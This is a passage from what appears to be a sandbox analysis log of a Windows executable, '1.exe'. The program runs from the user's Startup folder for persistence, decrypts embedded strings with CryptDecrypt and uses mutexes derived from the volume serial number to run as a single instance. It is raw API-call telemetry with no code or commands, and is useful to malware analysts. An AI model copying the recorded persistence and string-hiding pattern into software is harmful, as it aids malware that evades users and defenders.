lpFileSystemNameBuffer=0x0) returned 1 [0129.240] HeapFree (in: hHeap=0x2fb0000, dwFlags=0x0, lpMem=0x2fb1268 | out: hHeap=0x2fb0000) returned 1 [0129.240] RtlAllocateHeap (HeapHandle=0x2fb0000, Flags=0x0, Size=0x40) returned 0x2fb1240 [0129.240] CryptImportKey (in: hProv=0x15acf60, pbData=0x133f894, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x133f8fc | out: phKey=0x133f8fc*=0x15a8fa8) returned 1 [0129.240] CryptSetKeyParam (hKey=0x15a8fa8, dwParam=0x1, pbData=0x133f8e4, dwFlags=0x0) returned 1 [0129.240] CryptDecrypt (in: hKey=0x15a8fa8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2fb1240, pdwDataLen=0x133f8b0 | out: pbData=0x2fb1240, pdwDataLen=0x133f8b0) returned 1 [0129.240] CryptDestroyKey (hKey=0x15a8fa8) returned 1 [0129.240] RtlAllocateHeap (HeapHandle=0x2fb0000, Flags=0x8, Size=0x34) returned 0x2fb1288 [0129.240] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\0115B419773001") returned 0x0 [0129.240] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName="Global\\0115B419773001") returned 0x1f0 [0129.240] WaitForSingleObject (hHandle=0x1f0, dwMilliseconds=0x0) returned 0x0 [0129.240] HeapFree (in: hHeap=0x2fb0000, dwFlags=0x0, lpMem=0x2fb1240 | out: hHeap=0x2fb0000) returned 1 [0129.240] HeapFree (in: hHeap=0x2fb0000, dwFlags=0x0, lpMem=0x2fb1288 | out: hHeap=0x2fb0000) returned 1 [0129.240] ReleaseMutex (hMutex=0x1f0) returned 1 [0129.240] CloseHandle (hObject=0x1f0) returned 1 [0129.240] RtlAllocateHeap (HeapHandle=0x2fb0000, Flags=0x0, Size=0x20) returned 0x2fb1240 [0129.240] CryptImportKey (in: hProv=0x15acf60, pbData=0x133f874, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x133f8dc | out: phKey=0x133f8dc*=0x15a90a8) returned 1 [0129.240] CryptSetKeyParam (hKey=0x15a90a8, dwParam=0x1, pbData=0x133f8c4, dwFlags=0x0) returned 1 [0129.240] CryptDecrypt (in: hKey=0x15a90a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2fb1240, pdwDataLen=0x133f890 | out: pbData=0x2fb1240, pdwDataLen=0x133f890) returned 1 [0129.240] CryptDestroyKey (hKey=0x15a90a8) returned 1 [0129.240] RtlAllocateHeap (HeapHandle=0x2fb0000, Flags=0x8, Size=0x1e) returned 0x2fb1268 [0129.240] RtlAllocateHeap (HeapHandle=0x2fb0000, Flags=0x0, Size=0x1e) returned 0x2fb1290 [0129.240] RtlAllocateHeap (HeapHandle=0x2fb0000, Flags=0x0, Size=0x90) returned 0x2fb12b8 [0129.240] CryptImportKey (in: hProv=0x15acf60, pbData=0x133f84c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x133f8b4 | out: phKey=0x133f8b4*=0x15a91a8) returned 1 [0129.240] CryptSetKeyParam (hKey=0x15a91a8, dwParam=0x1, pbData=0x133f89c, dwFlags=0x0) returned 1 [0129.240] CryptDecrypt (in: hKey=0x15a91a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2fb12b8, pdwDataLen=0x133f868 | out: pbData=0x2fb12b8, pdwDataLen=0x133f868) returned 1 [0129.240] CryptDestroyKey (hKey=0x15a91a8) returned 1 [0129.240] HeapFree (in: hHeap=0x2fb0000, dwFlags=0x0, lpMem=0x2fb12b8 | out: hHeap=0x2fb0000) returned 1 [0129.240] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x2fb1268, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0129.240] HeapFree (in: hHeap=0x2fb0000, dwFlags=0x0, lpMem=0x2fb1290 | out: hHeap=0x2fb0000) returned 1 [0129.241] HeapFree (in: hHeap=0x2fb0000, dwFlags=0x0, lpMem=0x2fb1240 | out: hHeap=0x2fb0000) returned 1 [0129.241] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x133f91c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x133f91c*=0xb4197730, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0129.241] HeapFree (in: hHeap=0x2fb0000, dwFlags=0x0, lpMem=0x2fb1268 | out: hHeap=0x2fb0000) returned 1 [0129.241] RtlAllocateHeap (HeapHandle=0x2fb0000, Flags=0x0, Size=0x40) returned 0x2fb1240 [0129.241] CryptImportKey (in: hProv=0x15acf60, pbData=0x133f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x133f910 | out: phKey=0x133f910*=0x15a8fa8) returned 1 [0129.241] CryptSetKeyParam (hKey=0x15a8fa8, dwParam=0x1, pbData=0x133f8f8, dwFlags=0x0) returned 1 [0129.241] CryptDecrypt (in: hKey=0x15a8fa8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2fb1240, pdwDataLen=0x133f8c4 | out: pbData=0x2fb1240, pdwDataLen=0x133f8c4) returned 1 [0129.241] CryptDestroyKey (hKey=0x15a8fa8) returned 1 [0129.241] RtlAllocateHeap (HeapHandle=0x2fb0000, Flags=0x8, Size=0x34) returned 0x2fb1288 [0129.241] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\0115B419773000") returned 0x1f0 [0129.241] WaitForSingleObject (hHandle=0x1f0, dwMilliseconds=0x0) returned 0x102 [0129.241] CloseHandle (hObject=0x1f0) returned 1 [0129.241] HeapFree (in: hHeap=0x2fb0000, dwFlags=0x0, lpMem=0x2fb1240 | out: hHeap=0x2fb0000) returned 1 [0129.241] HeapFree (in: hHeap=0x2fb0000, dwFlags=0x0, lpMem=0x2fb1288 | out: hHeap=0x2fb0000) returned 1 [0129.241] HeapFree (in: hHeap=0x2fb0000, dwFlags=0x0, lpMem=0x2fb11f0 | out: hHeap=0x2fb0000) returned 1 [0129.241] HeapFree (in: hHeap=0x2fb0000, dwFlags=0x0, lpMem=0x2fb1218 | out: hHeap=0x2fb0000) returned 1 [0129.241] HeapFree (in: hHeap=0x2fb0000, dwFlags=0x0, lpMem=0x2fb11d8 | out: hHeap=0x2fb0000) returned 1 [0129.241] HeapFree (in: hHeap=0x2fb0000, dwFlags=0x0, lpMem=0x2fb1058 | out: hHeap=0x2fb0000) returned 1 [0129.241] HeapFree (in: hHeap=0x2fb0000, dwFlags=0x0, lpMem=0x2fb1fd0 | out: hHeap=0x2fb0000) returned 1 [0129.241] HeapFree (in: hHeap=0x2fb0000, dwFlags=0x0, lpMem=0x2fb1f98 | out: hHeap=0x2fb0000) returned 1 [0129.242] GetModuleHandleW (lpModuleName="mscoree.dll") returned 0x0 [0129.242] ExitProcess (uExitCode=0x0) [0129.242] HeapFree (in: hHeap=0x2fb0000, dwFlags=0x0, lpMem=0x2fb05a8 | out: hHeap=0x2fb0000) returned 1 Thread: id = 46 os_tid = 0xde4 Process: id = "10" image_name = "1.exe" filename = "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\1.exe" page_root = "0x55ea9000" os_pid = "0xddc" os_integrity_level = "0x2000" os_privileges = "0x40800000" monitor_reason = "autostart" parent_id = "0" os_parent_pid = "0x0" cmd_line = "\"C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\1.exe\" " cur_dir = "C:\\WINDOWS\\system32\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:000129f0" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 45 os_tid = 0xde0 [0129.104] GetStartupInfoW (in: lpStartupInfo=0xd6fe6c | out: lpStartupInfo=0xd6fe6c*(cb=0x44, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\1.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0129.104] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0129.104] HeapCreate (flOptions=0x0, dwInitialSize=0x1000, dwMaximumSize=0x0) returned 0x2cb0000 [0129.142] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74440000 [0129.142] GetProcAddress (hModule=0x74440000, lpProcName="FlsAlloc") returned 0x74454ae0 [0129.142] GetProcAddress (hModule=0x74440000, lpProcName="FlsGetValue") returned 0x74454b20 [0129.142] GetProcAddress (hModule=0x74440000, lpProcName="FlsSetValue") returned 0x74454b40 [0129.142] GetProcAddress (hModule=0x74440000, lpProcName="FlsFree") returned 0x74454b00 [0129.143] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x8, Size=0x214) returned 0x2cb05a8 [0129.143] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74440000 [0129.143] GetCurrentThreadId () returned 0xde0 [0129.143] GetStartupInfoW (in: lpStartupInfo=0xd6fe08 | out: lpStartupInfo=0xd6fe08*(cb=0x44, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\1.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x115726a, hStdOutput=0x11575a3, hStdError=0x2cb05a8)) [0129.143] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x8, Size=0x800) returned 0x2cb07c8 [0129.143] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0129.143] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0129.143] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0129.143] SetHandleCount (uNumber=0x20) returned 0x20 [0129.143] GetCommandLineA () returned="\"C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\1.exe\" " [0129.143] GetEnvironmentStringsW () returned 0x130ee48* [0129.143] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=::=::\\", cchWideChar=1410, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1410 [0129.143] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x582) returned 0x2cb0fd0 [0129.144] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=::=::\\", cchWideChar=1410, lpMultiByteStr=0x2cb0fd0, cbMultiByte=1410, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=::=::\\", lpUsedDefaultChar=0x0) returned 1410 [0129.144] FreeEnvironmentStringsW (penv=0x130ee48) returned 1 [0129.144] GetLastError () returned 0xcb [0129.144] SetLastError (dwErrCode=0xcb) [0129.144] GetLastError () returned 0xcb [0129.144] SetLastError (dwErrCode=0xcb) [0129.144] GetLastError () returned 0xcb [0129.144] SetLastError (dwErrCode=0xcb) [0129.144] GetACP () returned 0x4e4 [0129.144] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x220) returned 0x2cb1560 [0129.144] GetLastError () returned 0xcb [0129.144] SetLastError (dwErrCode=0xcb) [0129.144] IsValidCodePage (CodePage=0x4e4) returned 1 [0129.144] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0xd6fdd0 | out: lpCPInfo=0xd6fdd0) returned 1 [0129.144] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0xd6f89c | out: lpCPInfo=0xd6f89c) returned 1 [0129.144] GetLastError () returned 0xcb [0129.144] SetLastError (dwErrCode=0xcb) [0129.144] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0xd6fcb0, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0129.144] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0xd6fcb0, cbMultiByte=256, lpWideCharStr=0xd6f618, cchWideChar=256 | out: lpWideCharStr) returned 256 [0129.144] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr, cchSrc=256, lpCharType=0xd6f8b0 | out: lpCharType=0xd6f8b0) returned 1 [0129.144] GetLastError () returned 0xcb [0129.144] SetLastError (dwErrCode=0xcb) [0129.144] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0xd6fcb0, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0129.144] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0xd6fcb0, cbMultiByte=256, lpWideCharStr=0xd6f5e8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ魫ĕĀ") returned 256 [0129.144] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ魫ĕĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0129.144] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ魫ĕĀ", cchSrc=256, lpDestStr=0xd6f3d8, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿЀ") returned 256 [0129.144] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿЀ", cchWideChar=256, lpMultiByteStr=0xd6fbb0, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\xff\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xd7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\xaf\x3e\xc7\xa1\xe8\xfd\xd6", lpUsedDefaultChar=0x0) returned 256 [0129.144] GetLastError () returned 0xcb [0129.144] SetLastError (dwErrCode=0xcb) [0129.144] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0xd6fcb0, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0129.144] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0xd6fcb0, cbMultiByte=256, lpWideCharStr=0xd6f608, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ魫ĕĀ") returned 256 [0129.145] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ魫ĕĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0129.145] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ魫ĕĀ", cchSrc=256, lpDestStr=0xd6f3f8, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸЀ") returned 256 [0129.145] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸЀ", cchWideChar=256, lpMultiByteStr=0xd6fab0, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xf7\xd8\xd9\xda\xdb\xdc\xdd\xde\x9f\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\